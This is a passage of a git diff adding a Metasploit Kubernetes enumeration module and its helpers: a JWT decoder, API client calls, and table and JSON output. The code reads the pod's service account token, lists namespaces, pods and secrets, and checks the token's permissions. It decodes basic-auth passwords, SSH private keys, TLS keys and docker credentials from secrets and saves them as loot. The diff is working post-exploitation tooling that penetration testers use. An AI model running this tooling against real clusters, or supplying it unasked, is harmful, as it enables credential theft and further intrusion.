+msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pod namespace=default name=redis-7fd956df5-sbchb output=json 
+[*] Running module against 127.0.0.1
+
+[
+  {
+    "kind": "Pod",
+    "apiVersion": "v1",
+    "metadata": {
+      "name": "redis-7fd956df5-sbchb",
+      "generateName": "redis-7fd956df5-",
+      "namespace": "default",
+      "uid": "0f00c08c-bdb1-4206-94ce-5c447cd2d446",
+      "resourceVersion": "629723",
+      "creationTimestamp": "2021-09-16T22:33:33Z",
+      "labels": {
+        "app": "redis",
+        "pod-template-hash": "7fd956df5",
+        "role": "leader",
+        "tier": "backend"
+      },
+    },
+    ... etc ...
+  }
+]
+[*] Auxiliary module execution completed
+```
diff --git a/lib/msf/core/exploit/remote/http/jwt.rb b/lib/msf/core/exploit/remote/http/jwt.rb
new file mode 100644
index 000000000000..6d6867d87e85
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -0,0 +1,23 @@
+# Minimal JWT wrapper which only decodes the base64 header/claim values,
+# and doesn't encode/validate JWT tokens.
+#
+# Note that swapping this out for a third-party gem will work, but
+# there may be potential security issues with the key id (kid) claim etc,
+# which would need to be reviewed.
+module Msf::Exploit::Remote::HTTP::JWT
+  module_function
+
+  def encode(payload, key, algorithm = 'HS256', header_fields = {})
+    raise NotImplementedError
+  end
+
+  def decode(jwt, _key = nil, _verify = true, _options = {})
+    header, payload, signature = jwt.split('.', 3)
+    raise ArgumentError, "Invalid JWT format" if header.nil? || payload.nil? || signature.nil?
+
+    header = JSON.parse(Rex::Text.decode_base64(header))
+    payload = JSON.parse(Rex::Text.decode_base64(payload))
+
+    [payload, header]
+  end
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes.rb b/lib/msf/core/exploit/remote/http/kubernetes.rb
new file mode 100644
index 000000000000..934acead8023
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes.rb
@@ -0,0 +1,99 @@
+# -*- coding: binary -*-
+
+# Base mixin for Kubernetes exploits,
+module Msf::Exploit::Remote::HTTP::Kubernetes
+  include Msf::PostMixin
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        Msf::OptString.new('TOKEN', [false, 'Kubernetes API token']),
+        Msf::OptString.new('NAMESPACE', [false, 'The Kubernetes namespace', 'default']),
+      ]
+    )
+  end
+
+  def connect_ws(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def send_request_raw(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def api_token
+    @api_token || datastore['TOKEN']
+  end
+
+  def rhost
+    @rhost || datastore['RHOST']
+  end
+
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def namespace
+    @namespace || datastore['NAMESPACE']
+  end
+
+  def configure_via_session
+    vprint_status("Configuring options via session #{session.sid}")
+
+    unless directory?('/run/secrets/kubernetes.io')
+      # This would imply that the target is not a Kubernetes container
+      fail_with(Msf::Module::Failure::NotFound, 'The kubernetes.io directory was not found')
+    end
+
+    if api_token.blank?
+      token = read_file('/run/secrets/kubernetes.io/serviceaccount/token')
+      fail_with(Msf::Module::Failure::NotFound, 'The API token was not found, manually set the TOKEN option') if token.blank?
+
+      print_good("API Token: #{token}")
+      @api_token = token
+    end
+
+    if namespace.blank?
+      ns = read_file('/run/secrets/kubernetes.io/serviceaccount/namespace')
+      fail_with(Msf::Module::Failure::NotFound, 'The namespace was not found, manually set the NAMESPACE option') if ns.blank?
+
+      print_good("Namespace: #{ns}")
+      @namespace = ns
+    end
+
+    service_host = service_port = nil
+    if rhost.blank?
+      service_host = get_env('KUBERNETES_SERVICE_HOST')
+      fail_with(Msf::Module::Failure::NotFound, 'The KUBERNETES_SERVICE_HOST environment variable was not found, manually set the RHOSTS option') if service_host.blank?
+
+      @rhost = service_host
+    end
+
+    if rport.blank?
+      service_port = get_env('KUBERNETES_SERVICE_PORT_HTTPS')
+      fail_with(Msf::Module::Failure::NotFound, 'The KUBERNETES_SERVICE_PORT_HTTPS environment variable was not found, manually set the RPORT option') if service_port.blank?
+
+      @rport = service_port.to_i
+    end
+
+    if service_host || service_port
+      service = "#{Rex::Socket.is_ipv6?(service_host) ? '[' + service_host + ']' : service_host}:#{service_port}"
+      print_good("Kubernetes service host: #{service}")
+    end
+  end
+
+  def validate_configuration!
+    fail_with(Msf::Module::Failure::BadConfig, 'Missing option: RHOSTS') if rhost.blank?
+    fail_with(Msf::Module::Failure::BadConfig, 'Missing option: RPORT') if rport.blank?
+    fail_with(Msf::Module::Failure::BadConfig, 'Invalid option: RPORT') unless rport.to_i > 0 && rport.to_i < 65536
+    fail_with(Msf::Module::Failure::BadConfig, 'Missing option: TOKEN') if api_token.blank?
+    fail_with(Msf::Module::Failure::BadConfig, 'Missing option: NAMESPACE') if namespace.blank?
+  end
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb b/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb
new file mode 100644
index 000000000000..741f92612082
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes/auth_parser.rb
@@ -0,0 +1,193 @@
+# -*- coding: binary -*-
+
+# Parses the succinct Kubernetes authentication API response and converts it into
+# a more consumable format
+class Msf::Exploit::Remote::HTTP::Kubernetes::AuthParser
+  def initialize(auth_response)
+    @auth_response = auth_response
+  end
+
+  # Extracts the list of rules associated with a kubernetes auth response
+  def rules
+    resource_rules = auth_response.dig(:status, :resourceRules) || []
+    non_resource_rules = auth_response.dig(:status, :nonResourceRules) || []
+    policy_rules = resource_rules + non_resource_rules
+
+    broke_down_policy_rules = policy_rules.flat_map do |policy_rule|
+      breakdown_policy_rule(policy_rule)
+    end
+    compacted_rules = compact_policy_rules(broke_down_policy_rules)
+    sorted_rules = compacted_rules.sort_by { |rule| human_readable_policy_rule(rule) }
+
+    sorted_rules
+  end
+
+  # Converts the kubernetes auth response into an array of human readable table
+  def as_table
+    columns = ['Resources', 'Non-Resource URLs', 'Resource Names', 'Verbs']
+    rows = rules.map do |rule|
+      [
+        combine_resource_groups(rule[:resources], rule[:apiGroups]),
+        "[#{rule[:nonResourceURLs].join(' ')}]",
+        "[#{rule[:resourceNames].join(' ')}]",
+        "[#{rule[:verbs].join(' ')}]"
+      ]
+    end
+
+    { columns: columns, rows: rows }
+  end
+
+  protected
+
+  attr :auth_response
+
+  def policy_rule_for(apiGroups: [], resources: [], verbs: [], resourceNames: [], nonResourceURLs: [])
+    {
+      apiGroups: apiGroups,
+      resources: resources,
+      verbs: verbs,
+      resourceNames: resourceNames,
+      nonResourceURLs: nonResourceURLs
+    }
+  end
+
+  # Converts the original policy rule into its smaller policy rules, where
+  # there is at most one verb for each rule
+  def breakdown_policy_rule(policy_rule)
+    sub_rules = []
+    policy_rule.fetch(:apiGroups, []).each do |group|
+      policy_rule.fetch(:resources, []).each do |resource|
+        policy_rule.fetch(:verbs, []).each do |verb|
+          if policy_rule.fetch(:resourceNames, []).any?
+            sub_rules += policy_rule[:resourceNames].map do |resource_name|
+              policy_rule_for(
+                apiGroups: [group],
+                resources: [resource],
+                verbs: [verb],
+                resourceNames: [resource_name]
+              )
+            end
+          else
+            sub_rules << policy_rule_for(
+              apiGroups: [group],
+              resources: [resource],
+              verbs: [verb]
+            )
+          end
+        end
+      end
+    end
+
+    sub_rules += policy_rule.fetch(:nonResourceURLs, []).flat_map do |non_resource_url|
+      policy_rule[:verbs].map do |verb|
+        policy_rule_for(
+          nonResourceURLs: [non_resource_url],
+          verbs: [verb]
+        )
+      end
+    end
+
+    sub_rules
+  end
+
+  # Finds the original policy rule associated with a simplified rule
+  def find_policy(existing_simple_rules, simple_rule)
+    return nil if simple_rule.nil?
+
+    existing_simple_rules.each do |existing_simple_rule, policy|
+      is_match = (
+        existing_simple_rule[:group] == simple_rule[:group] &&
+          existing_simple_rule[:resource] == simple_rule[:resource] &&
+          existing_simple_rule[:resourceNameExist] == simple_rule[:resourceNameExist] &&
+          existing_simple_rule[:resourceName] == simple_rule[:resourceName]
+      )
+
+      if is_match
+        return policy
+      end
+    end
+
+    nil
+  end
+
+  # Merge policy rules together, by joining rules that are associated with the same resource, but different
+  # verbs
+  def compact_policy_rules(policy_rules)
+    compact_rules = []
+    simple_rules = {}
+    policy_rules.each do |policy_rule|
+      simple_rule = as_simple_rule(policy_rule)
+      if simple_rule
+        existing_rule = find_policy(simple_rules, simple_rule)
+
+        if existing_rule
+          existing_rule[:verbs] ||= []
+          existing_rule[:verbs] = (existing_rule[:verbs] + policy_rule[:verbs]).uniq
+        else
+          simple_rules[simple_rule] = policy_rule.clone
+        end
+      else
+        compact_rules << policy_rule
+      end
+    end
+
+    compact_rules += simple_rules.values
+    compact_rules
+  end
+
+  # returns nil if it's not possible to simplify this rule
+  def as_simple_rule(policy_rule)
+    return nil if policy_rule[:resourceNames].count > 1 || policy_rule[:nonResourceURLs].count > 0
+    return nil if policy_rule[:apiGroups].count != 1 || policy_rule[:resources].count != 1
+
+    allowed_keys = %i[apiGroups resources verbs resourceNames nonResourceURLs]
+    unsupported_keys = policy_rule.keys - allowed_keys
+    return nil if unsupported_keys.any?
+
+    simple_rule = {
+      group: policy_rule[:apiGroups][0],
+      resource: policy_rule[:resources][0],
+      resourceNameExist: false
+    }
+
+    if policy_rule[:resourceNames].any?
+      simple_rule.merge(
+        {
+          resourceNameExist: true,
+          resourceName: policy_rule[:resourceNames][0]
+        }
+      )
+    end
+
+    simple_rule
+  end
+
+  def human_readable_policy_rule(rule)
+    parts = []
+
+    parts << "APIGroups:[#{rule[:apiGroups].join(' ')}]" if rule[:apiGroups].any?
+    parts << "Resources:[#{rule[:resources].join(' ')}]" if rule[:resources].any?
+    parts << "NonResourceURLs:[#{rule[:nonResourceURLs].join(' ')}]" if rule[:nonResourceURLs].any?
+    parts << "ResourceNames:[#{rule[:resourceNames].join(' ')}]" if rule[:resourceNames].any?
+    parts << "Verbs:[#{rule[:verbs].join(' ')}]" if rule[:verbs].any?
+
+    parts.join(', ')
+  end
+
+  def combine_resource_groups(resources, groups)
+    return '' if resources.empty?
+
+    parts = resources[0].split('/', 2)
+    result = parts[0]
+
+    if groups.count > 0 && groups[0] != ''
+      result = result + '.' + groups[0]
+    end
+
+    if parts.count == 2
+      result = result + '/' + parts[1]
+    end
+
+    result
+  end
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/client.rb b/lib/msf/core/exploit/remote/http/kubernetes/client.rb
index 3cf84d2bd04b..9133ae47775b 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/client.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/client.rb
@@ -63,13 +63,15 @@ def exec_pod(name, namespace, command, options = {})
                   {
                     'method' => 'GET',
                     'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}/exec"),
-                    'query' => URI.encode_www_form({
-                      'command' => command,
-                      'stdin' => !!options.delete('stdin'),
-                      'stdout' => !!options.delete('stdout'),
-                      'stderr' => !!options.delete('stderr'),
-                      'tty' => !!options.delete('tty')
-                    }),
+                    'query' => URI.encode_www_form(
+                      {
+                        'command' => command,
+                        'stdin' => !!options.delete('stdin'),
+                        'stdout' => !!options.delete('stdout'),
+                        'stderr' => !!options.delete('stderr'),
+                        'tty' => !!options.delete('tty')
+                      }
+                    ),
                     'headers' => {
                       'Sec-Websocket-Protocol' => 'v4.channel.k8s.io'
                     }
@@ -107,6 +109,18 @@ def exec_pod_capture(name, namespace, command, options = {}, &block)
               result
             end
 
+            def get_version(options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri("/version")
+                },
+                options
+              )
+
+              json
+            end
+
             def get_pod(pod, namespace, options = {})
               _res, json = call_api(
                 {
@@ -119,6 +133,71 @@ def get_pod(pod, namespace, options = {})
               json
             end
 
+            def list_auth(namespace, options = {})
+              data = {
+                kind: "SelfSubjectRulesReview",
+                "apiVersion": "authorization.k8s.io/v1",
+                "metadata": {
+                  "creationTimestamp": nil
+                },
+                "spec": {
+                  "namespace": namespace
+                },
+                "status": {
+                  "resourceRules": nil,
+                  "nonResourceRules": nil,
+                  "incomplete": false
+                }
+              }
+
+              _res, json = call_api(
+                {
+                  'method' => 'POST',
+                  'uri' => http_client.normalize_uri('/apis/authorization.k8s.io/v1/selfsubjectrulesreviews'),
+                  'data' => JSON.pretty_generate(data)
+                },
+                options
+              )
+
+              json
+            end
+
+            def get_secret(secret, namespace, options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/secrets/#{secret}")
+                },
+                options
+              )
+
+              json
+            end
+
+            def list_secret(namespace, options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/secrets")
+                },
+                options
+              )
+
+              json
+            end
+
+            def get_namespace(namespace, options = {})
+              _res, json = call_api(
+                {
+                  'method' => 'GET',
+                  'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}")
+                },
+                options
+              )
+
+              json
+            end
+
             def list_namespace(options = {})
               _res, json = call_api(
                 {
@@ -131,7 +210,7 @@ def list_namespace(options = {})
               json
             end
 
-            def list_pods(namespace, options = {})
+            def list_pod(namespace, options = {})
               _res, json = call_api(
                 {
                   'method' => 'GET',
@@ -154,7 +233,7 @@ def create_pod(data, namespace, options = {})
               )
 
               if res.code != 201
-                raise Kubernetes::Error::UnexpectedStatusCode, res.code
+                raise Kubernetes::Error::UnexpectedStatusCode, res: res
               end
 
               json
@@ -183,21 +262,22 @@ def delete_pod(name, namespace, options = {})
 
             attr_reader :http_client
 
-            # TODO: Support receiving data directly as a table?
-            # Accept: application/json;as=Table;g=meta.k8s.io;v=v1beta1
-            # https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables
             def call_api(request, options = {})
               res = http_client.send_request_raw(request_options(request, options))
 
-              if res.nil? || res.body.empty?
-                raise Kubernetes::Error::ApiError
+              if res.nil? || res.body.nil?
+                raise Kubernetes::Error::ApiError.new(res: res)
               elsif res.code == 401
-                raise Kubernetes::Error::AuthenticationError
+                raise Kubernetes::Error::AuthenticationError.new(res: res)
+              elsif res.code == 403
+                raise Kubernetes::Error::ForbiddenError.new(res: res)
+              elsif res.code == 404
+                raise Kubernetes::Error::NotFoundError.new(res: res)
               end
 
               json = res.get_json_document
               if json.nil?
-                raise Kubernetes::Error::ApiError
+                raise Kubernetes::Error::ApiError.new(res: res)
               end
 
               [res, json.deep_symbolize_keys]
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
new file mode 100644
index 000000000000..9f697e8cf68a
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes/enumeration.rb
@@ -0,0 +1,214 @@
+# -*- coding: binary -*-
+
+# The mixin for enumerating a Msf::Exploit::Remote::HTTP::Kubernetes API
+module Msf::Exploit::Remote::HTTP::Kubernetes::Enumeration
+  def enum_all
+    enum_version
+    namespace_items = enum_namespaces
+    namespaces_name = namespace_items.map { |item| item.dig(:metadata, :name) }
+
+    # If there's no permissions to access namespaces, we can use the current token's namespace,
+    # as well as trying some common namespaces
+    if namespace_items.empty?
+      token_claims = parse_jwt(api_token)
+      current_token_namespace = token_claims&.dig('kubernetes.io', 'namespace')
+      possible_namespaces = (datastore['NAMESPACE_LIST'].split(',') + [current_token_namespace]).uniq.compact
+      namespaces_name += possible_namespaces
+
+      output.print_error("No namespaces available. Attempting the current token's namespace and common namespaces: #{namespaces_name.join(', ')}")
+    end
+
+    # Split the information for each namespace separately
+    namespaces_name.each.with_index do |namespace, index|
+      print_good("Namespace #{index}: #{namespace}")
+
+      enum_auth(namespace)
+      enum_pods(namespace)
+      enum_secrets(namespace)
+
+      print_line
+    end
+  end
+
+  def enum_version
+    attempt_enum(:version) do
+      version = kubernetes_client.get_version
+      output.print_version(version)
+    end
+  end
+
+  def enum_namespaces(name: nil)
+    output.print_good('Enumerating namespaces')
+
+    namespace_items = []
+    attempt_enum(:namespace) do
+      if name
+        namespace_items = [kubernetes_client.get_namespace(name)]
+      else
+        namespace_items = kubernetes_client.list_namespace.fetch(:items, [])
+      end
+    end
+    output.print_namespaces(namespace_items)
+    namespace_items
+  end
+
+  def enum_auth(namespace)
+    attempt_enum(:auth) do
+      auth = kubernetes_client.list_auth(namespace)
+      output.print_auth(namespace, auth)
+    end
+  end
+
+  def enum_pods(namespace, name: nil)
+    attempt_enum(:pod) do
+      if name
+        pods = [kubernetes_client.get_pod(name, namespace)]
+      else
+        pods = kubernetes_client.list_pod(namespace).fetch(:items, [])
+      end
+
+      output.print_pods(namespace, pods)
+    end
+  end
+
+  def enum_secrets(namespace, name: nil)
+    attempt_enum(:secret) do
+      if name
+        secrets = [kubernetes_client.get_secret(name, namespace)]
+      else
+        secrets = kubernetes_client.list_secret(namespace).fetch(:items, [])
+      end
+
+      output.print_secrets(namespace, secrets)
+      report_secrets(namespace, secrets)
+    end
+  end
+
+  protected
+
+  attr_reader :kubernetes_client, :output
+
+  def attempt_enum(resource, &block)
+    block.call
+  rescue Msf::Exploit::Remote::HTTP::Kubernetes::Error::ApiError => e
+    output.print_enum_failure(resource, e)
+  end
+
+  def report_secrets(namespace, secrets)
+    origin = create_credential_origin_service(
+      {
+        address: datastore['RHOST'],
+        port: datastore['RPORT'],
+        service_name: 'kubernetes',
+        protocol: 'tcp',
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      }
+    )
+
+    secrets.each do |secret|
+      credential_data = {
+        origin: origin,
+        origin_type: :service,
+        module_fullname: fullname,
+        workspace_id: myworkspace_id,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      resource_name = secret.dig(:metadata, :name)
+      loot_name_prefix = [
+        datastore['RHOST'],
+        namespace,
+        resource_name
+      ].join('_')
+
+      case secret[:type]
+      when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::BasicAuth
+        username = Rex::Text.decode_base64(secret.dig(:data, :username))
+        password = Rex::Text.decode_base64(secret.dig(:data, :password))
+
+        credential = credential_data.merge(
+          {
+            username: username,
+            private_type: :password,
+            private_data: password
+          }
+        )
+
+        print_good("basic_auth #{resource_name}: #{username}:#{password}")
+        create_credential(credential)
+      when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::TLSAuth
+        tls_cert = Rex::Text.decode_base64(secret.dig(:data, :"tls.crt"))
+        tls_key = Rex::Text.decode_base64(secret.dig(:data, :"tls.key"))
+        tls_subject = begin
+          OpenSSL::X509::Certificate.new(tls_cert).subject
+        rescue StandardError
+          nil
+        end
+        loot_name = loot_name_prefix + (tls_subject ? tls_subject.to_a.map { |name, data, _type| "#{name}-#{data}" }.join('-') : '')
+
+        path = store_loot('tls.key', 'text/plain', nil, tls_key, "#{loot_name}.key")
+        print_good("tls_key #{resource_name}: #{path}")
+
+        path = store_loot('tls.cert', 'text/plain', nil, tls_cert, "#{loot_name}.crt")
+        print_good("tls_cert #{resource_name}: #{path} (#{tls_subject || 'No Subject'})")
+      when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::ServiceAccountToken
+        data = secret[:data].clone
+        # decode keys to a human readable format that might be useful for users
+        %i[namespace token].each do |key|
+          data[key] = Rex::Text.decode_base64(data[key])
+        end
+        loot_name = loot_name_prefix + '-token'
+
+        path = store_loot('kubernetes.token', 'application/json', datastore['RHOST'], JSON.pretty_generate(data), loot_name)
+        print_good("service token #{resource_name}: #{path}")
+      when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::DockerConfigurationJson
+        json = Rex::Text.decode_base64(secret.dig(:data, :".dockerconfigjson"))
+        loot_name = loot_name_prefix + '-json'
+
+        path = store_loot('docker.json', 'application/json', nil, json, loot_name)
+        print_good("dockerconfig json #{resource_name}: #{path}")
+      when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::SSHAuth
+        data = Rex::Text.decode_base64(secret.dig(:data, :"ssh-privatekey"))
+        loot_name = loot_name_prefix + '-ssh_key'
+        private_key = parse_private_key(data)
+
+        credential = credential_data.merge(
+          {
+            private_type: :ssh_key,
+            public_data: private_key&.public_key,
+            private_data: private_key
+          }
+        )
+        begin
+          create_credential(credential)
+        rescue StandardError => _e
+          vprint_error("Unable to store #{loot_name} as a valid ssh_key pair")
+        end
+
+        path = store_loot('id_rsa', 'text/plain', nil, json, loot_name)
+        print_good("ssh_key #{resource_name}: #{path}")
+      end
+    rescue StandardError => e
+      elog("Failed parsing secret #{resource_name}", error: e)
+      print_error("Failed parsing secret #{resource_name}: #{e.message}")
+    end
+  end
+
+  def parse_private_key(data)
+    passphrase = nil
+    ask_passphrase = false
+
+    private_key = Net::SSH::KeyFactory.load_data_private_key(data, passphrase, ask_passphrase)
+    private_key
+  rescue StandardError => _e
+    nil
+  end
+
+  def parse_jwt(token)
+    claims, _header = Msf::Exploit::Remote::HTTP::JWT.decode(token)
+    claims
+  rescue ArgumentError
+    nil
+  end
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/error.rb b/lib/msf/core/exploit/remote/http/kubernetes/error.rb
index 90d321698c6f..80bd1bba59ea 100644
--- a/lib/msf/core/exploit/remote/http/kubernetes/error.rb
+++ b/lib/msf/core/exploit/remote/http/kubernetes/error.rb
@@ -7,17 +7,37 @@ module HTTP
         module Kubernetes
           module Error
             class ApiError < ::StandardError
+              def initialize(message: nil, res: nil)
+                super(message || "Kubernetes ApiError")
+                @res = res
+              end
+
+              attr_reader :res
             end
 
             class AuthenticationError < ApiError
+              def initialize(message: nil, res: nil)
+                super(message: message || "Kubernetes AuthenticationError - token may be invalid", res: res)
+              end
+            end
+
+            class ForbiddenError < ApiError
+              def initialize(message: nil, res: nil)
+                super(message: message || "Kubernetes ForbiddenError - token does not have permission to access this resource", res: res)
+              end
+            end
+
+            class NotFoundError < ApiError
+              def initialize(message: nil, res: nil)
+                super(message: message || "Kubernetes NotFoundError - resource not found", res: res)
+              end
             end
 
             class UnexpectedStatusCode < ApiError
               attr_reader :status_code
-
-              def initialize(status_code)
-                super
-                @status_code = status_code
+              def initialize(message: nil, res: nil)
+                super(message: message || "Kubernetes ApiError - unexpected response status code #{status_code}", res: res)
+                @status_code = res.code
               end
             end
           end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/output.rb b/lib/msf/core/exploit/remote/http/kubernetes/output.rb
new file mode 100644
index 000000000000..7156588c8764
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes/output.rb
@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+# The namespace for classes which can output Kubernetes API responses
+module Msf::Exploit::Remote::HTTP::Kubernetes::Output
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb b/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb
new file mode 100644
index 000000000000..434758a0e78a
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes/output/json.rb
@@ -0,0 +1,53 @@
+# -*- coding: binary -*-
+
+# Outputs Kubernetes API responses in JSON format
+class Msf::Exploit::Remote::HTTP::Kubernetes::Output::JSON
+  # Creates a new `Msf::Exploit::Remote::HTTP::Kubernetes::Output::JSON` instance
+  #
+  # @param [object] output The original output object with print_line/print_status/etc methods available.
+  def initialize(output)
+    @output = output
+  end
+
+  def print_error(*_args); end
+
+  def print_good(*_args); end
+
+  def print_status(*_args); end
+
+  def print_enum_failure(_resource, error)
+    if error.is_a?(Msf::Exploit::Remote::HTTP::Kubernetes::Error::ApiError) && error.res
+      print_json(error.res.get_json_document)
+    else
+      output.print_error(error.message)
+    end
+  end
+
+  def print_version(version)
+    print_json(version)
+  end
+
+  def print_namespaces(namespaces)
+    print_json(namespaces)
+  end
+
+  def print_auth(_namespace, auth)
+    print_json(auth)
+  end
+
+  def print_pods(_namespace, pods)
+    print_json(pods)
+  end
+
+  def print_secrets(_namespace, pods)
+    print_json(pods)
+  end
+
+  protected
+
+  attr_reader :output
+
+  def print_json(object)
+    output.print_line(JSON.pretty_generate(object))
+  end
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb b/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
new file mode 100644
index 000000000000..4749245987cb
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes/output/table.rb
@@ -0,0 +1,164 @@
+# -*- coding: binary -*-
+
+# Outputs Kubernetes API responses in table format
+class Msf::Exploit::Remote::HTTP::Kubernetes::Output::Table
+
+  # Creates a new `Msf::Exploit::Remote::HTTP::Kubernetes::Output::Table` instance
+  #
+  # @param [object] output The original output object with print_line/print_status/etc methods available.
+  # @param [String] highlight_name_pattern The regex used to highlight noteworthy resource names
+  def initialize(output, highlight_name_pattern: nil)
+    @output = output
+    @highlight_name_pattern = highlight_name_pattern
+  end
+
+  def print_error(*args)
+    output.print_error(*args)
+  end
+
+  def print_good(*args)
+    output.print_good(*args)
+  end
+
+  def print_status(*args)
+    output.print_status(*args)
+  end
+
+  def print_enum_failure(resource, error)
+    if error.is_a?(Msf::Exploit::Remote::HTTP::Kubernetes::Error::ApiError)
+      print_status("#{resource} failure - #{error.message}")
+    else
+      output.print_error(error.message)
+    end
+  end
+
+  def print_version(version)
+    print_good("Kubernetes service version: #{version.to_json}")
+  end
+
+  def print_namespaces(namespaces)
+    table = create_table(
+      'Header' => 'Namespaces',
+      'Columns' => ['#', 'name']
+    )
+
+    namespaces.each.with_index do |item, i|
+      table << [
+        i,
+        item.dig(:metadata, :name)
+      ]
+    end
+
+    print_table(table)
+  end
+
+  # Print the auth rules returned from a kubernetes client in the same format
+  # as `kubectl auth can-i --list --namespace default -v8`
+  def print_auth(namespace, auth)
+    auth_table = Msf::Exploit::Remote::HTTP::Kubernetes::AuthParser.new(auth).as_table
+
+    table = create_table(
+      'Header' => "Auth (namespace: #{namespace})",
+      # The table rows will already be sorted, disable the default sorting logic
+      'SortIndex' => -1,
+      'Columns' => auth_table[:columns],
+      'Rows' => auth_table[:rows]
+    )
+
+    print_table(table)
+  end
+
+  def print_pods(namespace, pods)
+    table = create_table(
+      'Header' => "Pods (namespace: #{namespace})",
+      'Columns' => ['#', 'namespace', 'name', 'status', 'containers', 'ip']
+    )
+
+    pods.each.with_index do |item, i|
+      containers = item.dig(:spec, :containers).map do |container|
+        ports = container.fetch(:ports, []).map do |ports|
+          "#{ports[:protocol]}:#{ports[:containerPort]}"
+        end.uniq
+        details = "image: #{container[:image]}"
+        details << " #{ports.join(',')}" if ports.any?
+        "#{container[:name]} (#{details})"
+      end
+      table << [
+        i,
+        namespace,
+        item.dig(:metadata, :name),
+        item.dig(:status, :phase),
+        containers.join(', '),
+        (item.dig(:status, :podIPs) || []).map { |ip| ip[:ip] }.join(',')
+      ]
+    end
+
+    print_table(table)
+  end
+
+  def print_secrets(namespace, secrets)
+    table = create_table(
+      'Header' => "Secrets (namespace: #{namespace})",
+      'Columns' => ['#', 'namespace', 'name', 'type', 'data', 'age']
+    )
+
+    secrets.each.with_index do |item, i|
+      table << [
+        i,
+        namespace,
+        item.dig(:metadata, :name),
+        item[:type],
+        item.fetch(:data, {}).keys.join(','),
+        item.dig(:metadata, :creationTimestamp)
+      ]
+    end
+
+    print_table(table)
+  end
+
+  protected
+
+  attr_reader :highlight_name_pattern, :output
+
+  def create_table(options)
+    default_options = {
+      'Indent' => indent_level,
+      # For now, don't perform any word wrapping on the table as it breaks the workflow of
+      # copying container/secret names
+      'WordWrap' => false,
+      'ColProps' => {
+        'data' => {
+          'Stylers' => [
+            Msf::Ui::Console::TablePrint::HighlightSubstringStyler.new([highlight_name_pattern])
+          ]
+        },
+        'name' => {
+          'Stylers' => [
+            Msf::Ui::Console::TablePrint::HighlightSubstringStyler.new([highlight_name_pattern])
+          ]
+        },
+        'age' => {
+          'Formatters' => [
+            Msf::Ui::Console::TablePrint::AgeFormatter.new
+          ]
+        }
+      }
+    }
+
+    Rex::Text::Table.new(default_options.merge(options))
+  end
+
+  def indent_level
+    2
+  end
+
+  def with_indent(string, amount = indent_level)
+    "#{' ' * amount}#{string}"
+  end
+
+  def print_table(table)
+    output.print(table.to_s)
+    output.print_line("#{' ' * indent_level}No rows") if table.rows.empty?
+    output.print_line
+  end
+end
diff --git a/lib/msf/core/exploit/remote/http/kubernetes/secret.rb b/lib/msf/core/exploit/remote/http/kubernetes/secret.rb
new file mode 100644
index 000000000000..3539a7c047cf
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/kubernetes/secret.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+# Secret types:
+#   https://kubernetes.io/docs/concepts/configuration/secret/
+module Msf::Exploit::Remote::HTTP::Kubernetes::Secret
+  # Arbitrary user-defined data
+  Opaque = 'Opaque'
+
+  # service account token
+  ServiceAccountToken = 'kubernetes.io/service-account-token'
+
+  # serialized ~/.dockercfg file
+  DockerConfiguration = 'kubernetes.io/dockercfg'
+
+  # serialized ~/.docker/config.json file
+  DockerConfigurationJson = 'kubernetes.io/dockerconfigjson'
+
+  # credentials for basic authentication
+  BasicAuth = 'kubernetes.io/basic-auth'
+
+  # credentials for SSH authentication
+  SSHAuth = 'kubernetes.io/ssh-auth'
+
+  # data for a TLS client or server
+  TLSAuth = 'kubernetes.io/tls'
+
+  # bootstrap token data
+  BootstrapTokenData = 'bootstrap.kubernetes.io/token'
+end
diff --git a/lib/msf/ui/console/module_action_commands.rb b/lib/msf/ui/console/module_action_commands.rb
index 2d984dbaed82..ce17b6db12bd 100644
--- a/lib/msf/ui/console/module_action_commands.rb
+++ b/lib/msf/ui/console/module_action_commands.rb
